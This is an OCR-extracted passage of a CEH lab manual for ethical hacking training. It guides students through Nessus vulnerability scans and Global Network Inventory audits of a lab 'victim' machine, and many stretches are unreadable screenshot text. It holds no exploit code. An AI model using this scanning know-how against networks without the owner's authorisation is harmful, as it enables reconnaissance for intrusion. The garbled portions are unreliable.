Module 03 - Scanning Networks />. 0 tc nessus L i I «•«‫״‬ ‫׳‬ TENA»Lg FIGURE 10.22: The Nessus Log In screen 29. The Nessus HomeFeed window appears. Click OK. • T A S K 2 Network Scan Vulnerabilities Q For theitemSSHuser name, enter the name ofthe account that isdedicatedto Nessus on eachofthe scan target systems. , 1 / / / 1 nessus inn rm m iv a u u r a h m k MMWuNMy i M W M u w J m i uh (eepenew. M to Itw idTBtH il lr» n m r■ ■ ] • tntimato mayload 10(*iMoaAon w l oaiiUtanter anyoustfton*oroigMtaAofii M • to a PTOtoMknalFMd Subecrtpfcxi ha<• 190* - ?0121)nM1 N M M s*.or*/ nc OK I FIGURE 10.23: Nessus HomeFeed subscription 30. After you successfully log in, the Nessus Daemon window appears as shown in the following screenshot. FIGURE 10.24: The Nessus main screen 31. If you have an Administrator Role, you can see die Users tab, which lists all Users, their Roles, and their Last Logins. m To addanewpolicy, chckPolicies ‫^־־‬ Add Policy. Ethical H acking and Counterm easures Copyright O by EC‫־‬Counc11 All Rights Reserved. Reproduction is Strictly Prohibited C E H Lab M anual Page 180
Module 03 - Scanning Networks Newpoliciesare configuredusingthe Credentials tab. FIGURE 10.25: The Nessus administrator view 32. To add a new policy, click Policies ‫>־‬ Add Policy. Fill in the General policy sections, namely, Basic, Scan, Network Congestion, Port Scanners, Port Scan Options, and Performance. ^WARNING: Any changes to the Nessus scanner configuration will affect ALL Nessus users. Edit these options carefully FIGURE 10.26: Adding Policies 33. To configure die credentials of new policy, click die Credentials tab shown in the left pane o f Add Policy. Ethical H acking and Counterm easures Copyright O by EC‫־‬Counc11 All Rights Reserved. Reproduction is Strictly Prohibited C E H Lab M anual Page 181
Module 03 - Scanning Networks m The most effective credentials scansarethose for whichthe suppliedcredentials haverootprivileges. FIGURE 10.27: Adding Policies and setting Credentials 34. To select the required plugins, click the Plugins tab in the left pane of Add Policy. ‫׳‬»‫״‬‫״‬.•P W OWBlc/Otr!«c» U r ir 7*‫*י‬18W8 eo?1Ax aunt0+m OCUkttO'ta •• -J’UrKlnl IoiiiiiIii«>>uII.W■..‫וי‬‫ין‬‫יי‬‫יני‬‫י‬O ^ r» u«!j Suit#1«o!v.b Oan ottKdfenwct, (a) 0«neral Vj GenlTOUKBlS*aj‫*׳‬yChK*» y mp-ux L0Ca Seaiftyc ‫׳‬k » i Jurat UjcUSacunty ChKM O A»««l fc**‫״‬ ftM■*2m* L*»r> *>IknU . o 1‫י‬‫ט‬ ‫ע‬ BaiHir r>KM1 &a.*3r Pa« 20AO. Rntrciin ftwaia O 1CWI ■■!Cl 1 Pi■ ‫ן‬— C 1 1 * Mawagwwew Oefcnon O 1&‫ז‬ ‫מ‬ C C H o AfflUM* p*01 (« ‫׳‬Melon O c«1tar« KTTPPra! Sit * ! Hcd H a ttt Rurola DoS <J 120MC tcd P o* F.irVVal 4■, 1 ‫.ו‬ uae VjInentollB |0 f. FS| 3wopn» Trie*matt tc* f*»1Cik r e TCPpoll *22 1WO. ‫יי***ד‬75‫ז‬ ffj»wy U elyB ialK W 5isA O ioai*scrtr **••*nee wmpars ‫־‬TCP&221 ‫ני‬1‫מ>׳»!יא‬ W vwrtce‫־‬CT.17* M t i K t A w k l m s j . TCP.'1781 4‫)ייי*ו.־*יז‬tcfirtocnU xlumg m Ifyouareusing Kerberos,you must configure a Nessus scanner to authenticate a KDC. FIGURE 10.28: Adding Policies and selecting Plugins 35. To configure preferences, click the Preferences tab in the left pane of Add Policy. 36. In the Plugin field, select Database settings from the drop-down list. aIfthe policyis successfullyadded, then the 37. Enter the Login details given at die time of registration. Nessus serverdisplaysthe massage 38. Give the Database SID: 4587, Database port to use: 124, and select Oracle auth type: SYSDBA. 39. Click Submit. Ethical H acking and Counterm easures Copyright O by EC‫־‬Counc11 All Rights Reserved. Reproduction is Strictly Prohibited C E H Lab M anual Page 182
FIGURE 10.29: Adding Policies and setting Preferences 40. A message Policy “NetworkScan_Policy‫״‬ w as su ccessfu lly added displays as shown as follows. FIGURE 10.30: The NetworkScan Policy 41. Now, click Scans ‫>־‬ Add to open the Add Scan window. 42. Input the field Name, Type, Policy, and Scan Target 43. 111 Scan Targets, enter die IP address of your network; here in this lab we are scanning 10.0.0.2. 44. Click Launch Scan at die bottom-right of the window. Note: The IP addresses may differ in your lab environment CDTools demonstrated in this lab are available in D:CEH- ToolsCEHv8 Module 03 Scanning Networks To scan the window, input the field name, type, policy, scan target, and target file. ‘ Ethical H acking and Counterm easures Copyright O by EC-CouncilC E H Lab M anual Page 183
Module 03 - Scanning Networks Nessus lias the abilityto save configured scan policies, network taigets, and reports as a .nessus file. FIGURE 10.31: Add Scan 45. The scan launches and starts scanning the network. FIGURE 10.32: Scanning in progress 46. After the scan is complete, click the Reports tab. FIGURE 10.33: Nessus Reports tab 47. Double-click Local Network to view the detailed scan report. ^ ‫י‬..-*— • gMtyi fc ■ d S ' Tools demonstrated in this lab are available in D:CEH• ToolsCEHv8 Module 03 Scanning Networks B n ■ B . Cvwii ' So-Mity ‫*־׳‬•‫״׳‬—«‫״‬ H m n t ■w11■1I K INWI • M m m tn Z •‫נ־י■׳‬ ‫ז*ו‬<•< £ [ l«v> H M H M m jm H9W •xfn H Into 1-01 Iftte U B •MO. In*) Me MUl-a* •*«-—■».»» * «Qi C«uMUrm tlmb«n rf UTMMB1W . i■■— 1 •M M • KTT*I n ■ T!•• M VIWMH W t N « M < N ilr a W U I I M tW M « l W M W lKM l M .-~> •rm *m »y%ttn1•hmlUn C M **• W ill-' McmcC A»: •an itf i LMO10?nb>njlutPu<»Funtu t SIDEwneutan WiMom M m x M t C o t n m k U u i u i m w m m uv» fro^jMren G&a»1fcsKr< CwMot fo r r J . i « H « a ‫־‬r 1r m riCniltoU D ■ 0. 0. ‫=־‬* FIGURE 10.34: Report of the scanned target Ethical H acking and Counterm easures Copyright O by EC‫־‬Counc11 All Rights Reserved. Reproduction is Strictly Prohibited C E H Lab M anual Page 184
Module 03 - Scanning Networks 48. Double-click any result to display a more detailed synopsis, description, security level, and solution. FIGURE 10.35: Report of a scanned target 49. Click the Download Report button in the left pane. 50. You can download available reports with a .n essu s extension from the drop-down list. Dow nload Report X Download Form at 1 C hapters Q If you are manually creating"nessusrc" files, there are several parameters that can be configured to specify SSH authentications. Chapter Selection NotAllowed Cancel Subm it FIGURE 10.36: Download Report with .nessus extension 51. Now, click Log out. 52. 111the Nessus Server Manager, click Stop N essu s Server. P ■ * 6B‫׳‬‫־‬‫׳‬■> M a ■69■ FIGURE 10.37: Log out Nessus Lab Analysis Document all die results and reports gadiered during die lab. G 3 To stop Nessus servei, go to the Nessus Server Manager and click Stop Nessus Server button. Ethical H acking and Counterm easures Copyright O by EC‫־‬Counc11 All Rights Reserved. Reproduction is Strictly Prohibited C E H Lab M anual Page 185
Module 03 - Scanning Networks T ool/U tility Inform ation Collected/O bjectives Achieved N essus Scan Target M achine: Local Host Perform ed Scan Policy: Network Scan Policy Target IP Address: 10.0.0.2 Result: Local Host vulnerabilities P L E A S E T A L K T O Y O U R I N S T R U C T O R I F Y O U H A V E Q U E S T I O N S R E L A T E D T O T H I S L A B . Questions 1. Evaluate the OS platforms that Nessus has builds for. Evaluate whether Nessus works with the security center. 2. Determine how the Nessus license works in a VM (Virtual Machine) environment. Internet Connection Required es0 Platform Supported 0 Classroom □ No □ iLabs C E H Lab M anual Page 186 Ethical H acking and Counterm easures Copyright O by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited
Module 03 - Scanning Networks Auditing Scanning by using Global Network Inventory Global]Seh)•orkInventory is usedas an auditscannerin ~erodeploymentand agent-free environments. It scansconrptiters byIP range, domain, con/p!itersorsingle computers, definedby the GlobalNet!/‫׳‬ork Inventory hostfie. Lab Scenario With the development o f network technologies and applications, network attacks are greatly increasing both in number and severity. Attackers always look for service vulnerabilities and application vulnerabilities on a network 01 servers. If an attacker finds a flaw or loophole in a service run over the Internet, the attacker will immediately use that to compromise the entire system and other data found, thus he or she can compromise other systems 011 the network. Similarly, if the attacker finds a workstation with adm inistrative privileges with faults in that workstation’s applications, they can execute an arbitrary code 01 implant viruses to intensify the damage to the network. As a key technique in network security domain, intrusion detection systems (IDSes) play a vital role of detecting various kinds of attacks and secure the networks. So, as an administrator you shoiild make sure that services do not run as the root user, and should be cautious of patches and updates for applications from vendors 01 security organizations such as CERT and CVE. Safeguards can be implemented so that email client software does not automatically open or execute attachments. 111 this lab, you will learn how networks are scanned using the Global Network Inventory tool. Lab Objectives This lab will show you how networks can be scanned and how to use Global Network Inventory. It will teach you how to: I C O N K E Y a - Valuable information s Test your knowledge Web exercise m Workbook review Use the Global Network Inventory tool Ethical H acking and Counterm easures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited. C E H Lab M anual Page 187
Module 03 - Scanning Networks Lab Environment To cany out die lab, you need: ■ Global Network Inventory tool located at D:CEH-ToolsCEHv8 Module 03 Scanning NetworksScanning ToolsGlobal Network Inventory Scanner ■ You can also download the latest version of Global Network Inventory from this link http://www.magnetosoft.com/products/global network inventory/gn i features.htm/ ■ If you decide to download the latest version, then screen sh ots shown in the lab might differ ■ A computer running Windows Server 2012 as attacker (host machine) ■ Another computer running Window Server 2008 as victim (virtual machine) ■ A web browser with Internet access ■ Follow die wizard-driven installation steps to install Global Network Inventory ■ Administrative privileges to run tools Lab Duration Time: 20 Minutes Overview of Global Network Inventory Global Network Inventory is one of die de facto tools for security auditing and testing of firewalls and networks, it is also used to exploit Idle Scanning. Lab Tasks 1. Launch the Start menu by hovering die mouse cursor in the lower-left corner of die desktop. FIGURE 11.1: Windows Server 2012 - Desktop view 2. Click die Global Network Inventory app to open die Global Network Inventory window. ZZ‫ל‬Tools demonstrated in this lab are available in D:CEH- ToolsCEHv8 Module 03 Scanning Networks t a s k 1 Scanning the network Ethical H acking and Counterm easures Copyright O by EC‫־‬Counc11 All Rights Reserved. Reproduction is Strictly Prohibited C E H Lab M anual Page 188
Module 03 - Scanning Networks 5 t 9 |‫£־׳‬ Administrator Server M anager Windows PcrwerShell G oogle Chrome Hn>er.V Manager fL m * ‫י‬‫ו‬ *J Control Panel ■F H y p r-V Virtual M achine. SQLServs * £Mww&plcm Com m and Prompt B Mozfla Firefo* S - B u i Search 01.. Global N ec»ort PutBap © H Scan computers by IP range, by domain, single computers, or computers, defined by the Global Network Inventory host file FIGURE 112: Windows Server 2012 - Apps 3. The Global Network Inventory Main window appears as shown in die following figure. 4. The Tip of Day window also appears; click Close. & S can only item s that you need by customizing scan elem ents 5. Turn 011 Windows Server 2008 virtual machine from Hyper-V Manager. FIGURE 11.3 Global Network Inventory Maui Window Ethical H acking and Counterm easures Copyright O by EC‫־‬Counc11 All Rights Reserved. Reproduction is Strictly Prohibited C E H Lab M anual Page 189
Module 03 - Scanning Networks FIGURE 11.4: Windows 2008 Virtual Machine 6. Now switch back to Windows Server 2012 machine, and a new Audit Wizard window will appear. Click Next (01‫־‬in die toolbar select Scan tab and click Launch audit wizard). □ Reliable IP detection and identification of network appliances such as network printers, document centers, hubs, and other devices VI EWS S CAN R E S U L T S , / N C L U D/ N C HI S TORI C R E S U L T S F O R A L L S CANS , I NDI VI DUAL M A C H I N E S , OK 7. Select IP range scan and dien click Next in die Audit Scan Mode wizard. S E L E C T E D NUMBER OF A D D R E S S E S NewAudit Wizard Welcome to the New Audit Wizard Ths wizard will guide you through the process of creating a new inventory audit. To continue, click Next. c Back Next > Cancel FIGURE 11.5: Global Network Inventory new audit wizard Ethical H acking and Counterm easures Copyright O by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited C E H Lab M anual Page 190
Module 03 - Scanning Networks New Audit Wizard Audit Scan Mode To start a new audfc scan you must choose the scenario that best fits how you w i Is■(^ M be using this scan. O Single address scan Choose this mode i you want to audit a single computer (•) IP range scan Choose this mode i you want to audit a group of computers wttwn a sr>gle IP range O Domain scan Choose this mode i you want to audit computers that are part of the same doma»1(s) 0 Host file scan Choose this mode to audt computers specified in the host file The most common scenario is to audt a group of computers without auditing an IP range or a domain O Export audit agent Choose this mode i you want to audit computers using a domain login script. An audit agent vwi be exported to a shared directory. It can later be used in the domain loain scriot. To continue, cick Next. 1 <Back Nexi > Cancel ______ FIGURE 11.6: Global Network Inventory Audit Scan Mode 8. Set ail IP range scanand then click Next in die IP Range Scan wizard. 9. 111die Authentication Settings wizard, select Connect as and fill the respected credentials of your Windows Server 2008 Virtual Machine, and click Next. Q Fully customizable layouts and color schemes on all views and reports Export data to HTML, XML, Microsoft Excel, and text formats Licenses are network- based rather than user- based. In addition, extra licenses to cover additional addresses can be purchased at any time if required Ethical H acking and Counterm easures Copyright O by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited C E H Lab M anual Page 191
Module 03 - Scanning Networks £□ The program com es with dozens of customizable reports. New reports can be easily added through the user interface 10. Live die settings as default and click Finish to complete die wizard. (— 7 Ability to generate reports on schedule after every scan, daily, weekly, or monthly (§₪ To configure reports choose Reports | Configure reports from the main menu and select a report from a tree control on a left. Each report can be configured independently 11. It displays die Scanning progress in die Scan progress window. New Audit Wizard Completing the New Audit Wizard You are ready to start a new IP range scan You can set the following options for this scan: @ Donot record unavailablenodes @ Open scan progress dialog when scan starts Rescan nodes that have been successfJy scanned Rescan, but no more than once a day To complete this wizard, dick Finish. < Back Frwh Caned FIGURE 11.9: Global Network Inventory final Audit wizard New Audit Wizard Authentication Settings Specify the authentication settings to use to connect to a remote computer O Connect as cxrrertiy logged on user (•) Connect as Domain User name ad^iriS'3(-‫•׳‬ Password ...............' To continue, d c k Next <Back Nert > Caned FIGURE 11.8 Global Network Inventory Authentication settings Ethical H acking and Counterm easures Copyright O by EC‫־‬Counc11 All Rights Reserved. Reproduction is Strictly Prohibited C E H Lab M anual Page 192
Module 03 - Scanning Networks Q Filtering is a quick way to find a subset of data within a dataset. A filtered gnd displays only the nodes that meet the criteria you specified for a column(s) 12. After completion, scanning results can be viewed as shown in the following figure. 0 Global Network Inventory lets you change grid layout simply by dragging column headers using the mouse. Dropping a header onto the Grouping pane groups data according to the values stored within the "grouped" column FIGURE 11.11: Global Network Inventory result window 13. Now select Windows Server 2008 machine from view results to view individual results. Globa' Network Inventory - Unregistered Pf i e V iew Stan T ools R eports H elp i'v - □]E r BlBWtalri~»EI] u *‫י‬ ? a ‫־־‬A.W‫.־‬‫■־‬!‫־‬N etBIOS | A Shanes JWU ter r C a r r ie ♦ s>«en Q Prr*»M 0r* ^ M an beard Memory pin Memory *rc m n a o n ]Syttern *tat» | A ) HM ftte‫ז»ר‬‫ס‬ rjqr ^ r r tm Networt:•-•‫ד‬.i w ra r r r S car M W i p 1^p#rat:r.r |Q g m erit V e rrfa w 0 3 Mams ‫־‬» R o c e s s a ... *‫.־‬ Comment ‫»־‬ |Tircitamp ‫־י‬ HoatN ... ▼J Status ‫־י‬ M A C A.. d D o r a r W O R K G R O U P [C O U N T-2 ) I P A d d e « : 10.0 0.4 (COUN T-11 Trre sta ro : G£2/2012 3 36:4B PM (C O U N T -1 ) ‫■־‬» C o r o j.. |v/N ULV85(| S ucccii 100-15 5D 001 M ic ro :)* C a V irc c v M Server | IP A d d c m . T 0.0 0.7 (C0UNT-=11 I T rre jta r.3 . & 36. 30 3 2012 >‫׳‬22‫׳‬ PM (C 0 U N T -1 ] •» C « ‫־‬k>j ..[v /N €3SM F||Su c c o m iD ^-O E-D O -C^noalc‘. |lnts(Rl CoiefTM' Solid. H202 Oisplaye^roijp^l^roups [ r 1 R « ju ltjn 1 it0 r y d e p t^ L » !ts< a r 1 0 r ^ Tow?nwr(t) Nirrt - MpIa■addresses $ ‫־‬ W O R K G R O U P :■I 10.0JX7 (W IN-D39... ■m 1 a0JX ‫«־‬ (W 1N-ULV8... iJ Scan progress ‫מ‬ Address Name Percent Tmestamp 1A 0 1 0 .0 .0 .2 — E ! % 08/22/1215 3 8 :3 1 10.0.0.3 E* 08/22/1215:36:23 2 10.0.0.4 W1N-ULY858KHQIP 852 08/22/1215:36:25 3 0.0.0.5‫ו‬ E! * 08/22/1215:36:23 = 4 0 60.0‫ו‬ AOMINPC 9 2 * | 08/22/1215:36:23 5 10.0.0.7 WIN-039MR5HL9E4 9 2 * | 08/22/1215:36:22 6 10.0.08 ! z z 08/22/1215:36:23 7 1 0 .0 0 9 ^ z _ 08/22/1215:36 24 8 1 0 0 0 1 0 W 08/22/1215:36 24 9 1 0 0 0 1 1 E* 08/22/1215:36:24 1 0 1 0 .0 .0 .1 2 ' E* 08/22/1215:36:24 ‫ו‬ ‫ו‬ 10.0.0.13 ' E* 08/22/1215:36:24 2‫ו‬ 10.0.014 I E* 08/22/1215:36:24 rtn m‫ר‬ ic .v .^ 1 @ Open this dialog sdien scan starts Elapsed time: 0 min 6 sec @ Close this dialog when scan completes Scanned nodes: 0/24 @ D onl display completed scans . Sl0p _ Cl°” [ FIGURE 11.10: Global Network Inventory Scanning Progress Ethical H acking and Counterm easures Copyright O by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited C E H Lab M anual Page 193
Module 03 - Scanning Networks l - l ° W *Global Network Inventory ‫־‬ Unregistered M e v ie w sc a n Tool( R eport < H ?p in - %-u110 | s ^ P i g ¥ B |Q |^ |a |D |B - B # ® , ■'‫מ-י‬ ‫־‬ - Looca d!ss ^ Z»: - ‫־‬‫־‬ Port a rre d o R | System dots |^ Hot fxes3 e ;jr**• certer | 3 ‫׳‬■ Startup ■ Desktoo ^ Orvces 3 NetBIOS | ^ Shores L » ^cvps ^ Lbcre | J Logged c r j Computer 3y3tcn Q Po;c3:cn> '•'ci‫־׳‬ bosd ^ Morer) B8 Scan •unrary §, ^ 0 ‫כ‬‫נ‬ ctn3 C,ctcn (ji) Q Type ‫״‬ HikIM » Sfdlin » MAC A * VbtkIh » CJS * PlOCHZM ( * C0I1HIMf » J Duiein *‫׳‬o ^ e n a jp COUNT-11 JIPAddrew 10.Cl07(COUNT1‫־‬) TncUaro: G/22/2012 3 GG:38 PM (COUNT-1) ■» C5t o j . |V/NC39MR Succc« |D4 BE D9-C|Realck ntefR] CorcfTM' Send: H202! 01011‫ז‬ i‫׳‬a»(j) &S9 3 □ » N e rr c B ‫י^יי‬ AH addresses B- <* WORKGROUP *|^r)0.a7(WN-D3T~1 »• ‫ו‬‫י‬‫נ‬ C J 4 iv>‫׳‬N-ULV3.r. ^jgl^c^roug^l^r^esufc^jto^jegt^oj^ca^o^oc^cdfcj^Re»dr FIGURE 11.12 Global Network Inventory Individual machine results 14. The Scan Summary section gives you a brief summary of die machines diat have been scanned 1- ‫^־‬ rGlobal Network Inventory ‫־‬ Unregistered 1 ^ - s a a w- fie View Scan Tools Reports Melo *5 ' tin>lcr5 k V critoo | jjjjj Logical dska ^ CX>k & tszi m o "Sntcn | j* Networx oocptoo‫נ‬‫כ‬ y w d o n ( j S^eton dot• Hoi tacoe Q S ocu ty ccrto■ J Startup | H Dcckiop ^Sn D ovcoi [# j NoifcKJS | £ Sharoe J t 0 $orgroupt ^ U*«ra fa LoggoCon J - .r%xi*rtyrt»r Q :■^:•;ore ^ M a n te s : * 5 B*S Menoiy cevicee |l# | Scan a n rm y j ^ ® ] ijperatmg Q □ ] e t 1 ▼ a x Hcs4 H.. - Status ‫־״‬ MACA .. ‫■״־‬barrio- ~ OSKsrw ‫־י‬ Prco3350r.. ‫״י‬ Corrmert■‫״‬ -‫־‬JLrJ.‫־‬l‫׳־‬d t'o m a r :v tR r.ii-O U h!el(R)Cme|TM: Seiial H?‫?ר‬ ^ P id ie w : 1C.O.O : CQUNT=1J _________________________ Id Tnrgra«p B/22;2PlZ3-36 ^PM p=DUHr=ll | ;*» Ccnpu |WK-039MR|Succg« rU-BF-D»C:| R ^ rri 1‫־‬ r1‫־‬ rTolall 4em(s) n 1* a □ * a Nam• - ‫■י‬! A1addrestM ^ £ WORKGROUP :mtOiXOi’^N-ULYC" ^c^U^iiitorydepthj FIGURE 11.13: Global Inventory Scan Summary tab 15. The Bios section gives details of Bios settings. Global Network Inventory grid color scheme is completely customizable. You can change Global Network Inventory colors by selecting Tools | Grid colors from main menu and changing colors ‫ם‬ To configure results history level choose Scan | Results history level from the main menu and set the desired history level Ethical H acking and Counterm easures Copyright O by EC‫־‬Counc11 All Rights Reserved. Reproduction is Strictly Prohibited C E H Lab M anual Page 194
Module 03 - Scanning Networks aScan only items that you need by customizing scan elements 16. The Memory tab summarizes die memory in your scanned machine. £□ E-mail address - Specifies the e- mail address that people should use when sending e- mail to you at this account. The e- mail address must be in the format name(ftcompany— for example, someone@mycom pany.com 17. In die NetBIOS section, complete details can be viewed. Global Network Inventory - Unregistered F ie V ie w Scan Tools R eports h e lp * • ‫ח‬ H e V iB lB & lm lH F i- iii ® - ‫-•:!־־־‬ •> Network a d ^ c n ! Q 1 ‫ו׳*חוח‬0‫י»ת‬ | ' j ber/1r*c ■t• ‫־‬5 ‫׳‬ Startup | K %- tk # n or Memoryf l w f « ■» M »0 coofirokn L . Mentors | g j Logical daks t M Oak ±n >#H iff) Operating ‫׳,ל‬d-• ‫״‬‫ן‬ ‫י‬ y -. ‫־‬‫־‬■‫־‬■• ct encct f H ‫׳‬11 ‫■•יי‬fff D*Ye*t [#] NmBIOS | Shw*1 p Uttramu a Tc<alPh3^cdven>0f/.M3 - Salable H-yrea... Total vfcuaL. ~ A v a to e V rtja ... »• lo ta ...-- &valabl&.. ‫»י‬ d[D V.CRt5F0UP[CrMJN'=]J Hcsr Marre 3 9 ^ ^ ‫־‬MF5HL9E4 (C0U!iT=1) J ‫־‬ hrescnp V22J20123:36-38 PM (COUNT‫־‬ ) | 3317 7 o b i 1 its u ;1 view retuR* ▼ a x ** s«a □ ‫מ‬ « N am * H % All eddresse* 4 # WOWCROUP ‫־‬■*w p y ‫־‬ ;h I0.C.0.4 (WIN-ULY8... O iip la /ed group: All groupsResults history depth: Last scan fo i each address FIGURE 11.15: Global Network Inventory Memorytab ‫ז‬x‫־‬ ' ° '1Global Network Inventory ‫־‬ Unregistered ^ k . j i j ‫״‬ . ■rr- q .7: ■> fid. . • ‫־‬‫ד‬^ Por. -annccfcrc Q System dots Hct fixes £ Scaabr e a te r 3" Startup ■ Desktop Derive* 2 MdBIOS ^ Shares .s r jx x p s )£• 1555 | ^ Lccocd or P Poeewots Mar ?pad Merer? >*‫י‬ Memory donees J^ Opcra.i-10 Cvs.or Q fc l ‫׳‬cut f i t v ie w 5tan Tools R eport( H elp 1^ ‫־‬‫ז‬ S J1 '’‫־‬□ E T? |5 |□ icwresufts ‫׳יי‬ X Ssa^aumanr ‫ו‬1*011 Q 'tp lt/« d group: All grouptRetjttt hutory depth: Latt to n for tacft aflcret; * 89 £ □ J5 Narrc _ H * P All ad d resses B 5 ‫־‬ WORKGROUP •»|1a616T(w’1^039.7''' { ■ 10.0.1‫>נ*ר‬VIN-IJI Y8... »U»d/ FIGURE 11.14: Global Network Inventory Bios summary tab Ethical H acking and Counterm easures Copyright O by EC‫־‬Counc11 All Rights Reserved. Reproduction is Strictly Prohibited C E H Lab M anual Page 195
Module 03 - Scanning Networks M essage subject - Type the Subject of your message. Global Network Inventory cannot post a message that does not contain a subject FIGURE 11:16: Global Network Inventory NetBIOS tab 18. The User Groups tab shows user account details with die work group. □ Name - Specifies the friendly name associated with your e-mail address. When you send m essages, this name appears in the From box of your outgoing m essages 19. The Logged on tab shows detailed logged on details of die machine. ‫ם‬1‫־‬IG'obel Network Inventory ‫־‬ Unregistered Fie View Scan Tools Reports Help 1□ c V |B p |g |m | a M em ?y ‫מ‬ Memory cfcvccs ‫■י‬P rrtc o •> N e tte d ‫־‬. E l !nvronmcrrt cr j• Startup ■ Deaktoo A - _bera I, Lojj=d or 2 C o n ju ta s rrf— Q P^cc350ra |^ M a r board I^J) »‫־‬ccc • I ‫־‬ : k Vent‫רה‬ Locicoldbks ^ D9sdr>c* m #> CIO‫כ‬ j j ] Opcralinq Cyslcrr Q 7 ‫י‬ Q ij0 «• ^ D evicc: It#] Net Cl DC ^ Shares | J ? -b w g rx x » H o s tN c n e ‫/־‬ / * -D39-4R5HL9E4(COUNT-51 z i ' rre sc a n p : E /2 2 '20 1 2 3:36:38 FM ( COUN5- ‫ל‬] G io u j £<*ar>sfrafo:(C0UNT=1) ‫■׳י‬‫!׳‬ S 0 CEN R 5HL3E4'>Adrim$tratoi U5cr occcu rt z i C r^ JD : C K ttK ite d COM Usets (COUN I - 1 1 v /lsC 2 S N R 5 H _ 3 E 4 A d f1 i‫״‬ istj<)(01 U ;et accourt _ J Gr»^ o: Guc:»; C O U N T-1) Jk• u A N 0 3 E M R 5 H L 9 E 4 G u tsl U :* f « ccou rt dC10*.IIS JU S fiS COUNT■!) % NT >‫־‬ FlZcV ^ cpcrlSc«vor VV«# k rc v ‫׳‬ n gtcup oooounl z i G r a if p M ta v u re * 1rg U ttrt(C Q I J N T ■1) T U 0 I5 i cn |i| S3 5) □ *3 $ Njit« * i* A ll a d d re ss•: - i f WORKGROUP ? S i i i l L »• i a i J i w N S : ‫׳‬ D splaycC group; All qioupaRcsuMts history depth: Last scan fo i each o o a e s !R sad / FIGURE 11.17: Global Network Inventory User groups section ; - ! o rGlobal Network Inventory ‫־‬ Unregistered F ie v ie w S o n Tools R eports Help !□is? iBiaiasp 5!■!a & » B Memcry ® a Memory devicec 4 • Scan 3 jm a r y ♦ S ) h itd te d « y t *sre C l n v m m g rt | ; & Services ‫ד‬ Port con rw ctrc C l Q f S * d r t / M ‫׳‬t« r Startup‫ל‬3."| ■ Desktop logged on zJ Hart l l i n * 0 33* | , ‫י‬‫׳‬ VF5H. =)E4 (COLNT=3) T r^rtartp 8/22V2012 3:3ft 38 FM (COUNT3‫־‬ ) * [W K -0 3 9 M R o - LSE4<C>tt>> L m qj? W oik statcr Service X W K C •SM R^rLSE4<0x2O5‫־‬ L n q u e F ie Server Service 3 WORKGROUP <0x00> Group Domain Name T o id 3 i.e n ld t»<pt»/ed group: A ll grou psRemits history depth H it scan ret earh naorett v * y* results N a1r « - &I addresses H - f i ‫־‬ W O R K G R O U P 1C.0.C.’ (WIN-D39... 19 10^f^U L Y «:: Rea fly Ethical H acking and Counterm easures Copyright O by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited C E H Lab M anual Page 196
Module 03 - Scanning Networks & Port ‫־‬ Specifies the port number you connect to on your outgoing e- mail (SMTP) server. This port number is usually 2 5 . 20. Tlie Port connectors section shows ports connected in die network. O utgoing mail (SM TP) ‫־‬ Specifies your Simple Mail Transfer Protocol (SMTP) server for outgoing messages 21. Tlie Service section give die details of die services installed in die machine. Globa' Network Inventory - UnregisteredS T Scan T oolt R eport( H elpF ile 1S 1 Users | Logged on may Memory devotes : -t‫־‬KC1: •£‫־‬‫׳‬ Network 0d3?1cr: Q fcrvronment | S « m :« a Startup ■1 Desktop NetBIOS £ 91‫־‬ares Ji> LSe n Fiocessois ^ L . l-b n tc rj £ L og cal disks D: * WOS | S ) 0p«1fcrg Syren• ‫—ן‬ J O ^ hrr ‫י‬ ;can currrjr, P« t connectors D o r ia n . V /D ^ K O R O U ? (C0UNT=25I J he*• H a r e : t*‫׳‬T . D39M R5HLJ3E4(CO U NT-25) J 1 ■‫״‬ * t t a r o : & '22/2D 12 3 3 6 3 8 PM (COUNT =26) ‫כו׳ן‬‫כ‬‫א‬’ Serai P o r 1S55CA C on p artle D 6 9 ‫.־‬Male ‫»ככ‬7‫ז‬ K e l o i d P011 F S /2 ‫כ‬ ‫נ‬»7‫ז‬ M oucc Pori F S /2 ’ 7 0 3 H USB a<r*51 bus t7 0 0 h USB ‫ווכ‬7 3‫י‬ UCD A cc0H .bu 4 , 7 0 3 H USB A coest.bu t ‫ז‬ alal 25 Atris Disj ayecl arouo; All aroupsFes jts nistory deptn: Last scan foi eatfi address view resut; w a x a ‫ש‬ b # Name H - AH addresses f r £* W O R K G R O U P ■»r10bn ‫־‬7‫־‬ ^N-big".'‫־‬.‫־‬ 0^10 ‫(.«־‬W‫׳‬fW‫׳‬N‫־‬ULY8"" FIGURE 11.19; Global Network Inventory Port connectors tab ‫״‬ ■ ‫״‬ ■1- 1Globa! Network Inventoiy ‫־‬ Unregistered M e v ie w 5<ar Tools R eports H elp § 3 - □Is ? H c 1 ® e / -•1a & ‫׳״‬ J ‫ב‬ ‫ג‬ ‫ו‬ a i d s y ie f i Q Processors £ Main beard ^ N e n o iy w Memory d e /c e s ^ L>j1d js v j Q Di:-•. J . £■ Net ■.. m Scan suran aiy ^ B C S |.§ ) O oefatro System l£ ‫)־‬ to ta le d software | ( | Environment Services | ‫?יי‬ Port c o m e d o s System slots | Hotfixes ^ S e a it ) eerier % 3 .< n : u ,_ _ H L _ 2 s 5 tlS B _ J C‫־־‬r ■^r . '* {3 0 S 2 ' Sha‫׳‬e& > U s e tu . Users | j> Logged o r J H o a N o k W H-033N R 5HL3£4 (C O U N T S 1 N T S ER V .C E >MsDisServerl 10 f H ” S E R V C E 'M S S Q L F D L o u n c h a f N ‫־‬ £ £ R V lC E VM S S Q L S E R V E R f N ‫־‬ S E R V C E 'M S S Q L S e r/e iO L A P S e iv ie e * , N ‫־‬ S E R V C E 'R e p o rtS c rv a 5 A H D39M REHL9E4A< inhatr‫*־‬or 38/22/12 09:01:20 Oowove^rou^lUroupsResults f r it pry dep th last ;can lo r te c h a d d rc n V « w re<uKs *2 » ‫־־‬‫י‬ □ m Nerrc _ E % A ll addresses S f W O R K G R O U P ;1abix7"(wi‫׳‬N-D3g... ;■ '1 6 0 .0 4 (W IN-ULY8... Ready FIGURE 11.18: Global Network Inventory Lowed on Section Ethical H acking and Counterm easures Copyright O by EC‫־‬Counc11 All Rights Reserved. Reproduction is Strictly Prohibited C E H Lab M anual Page 197
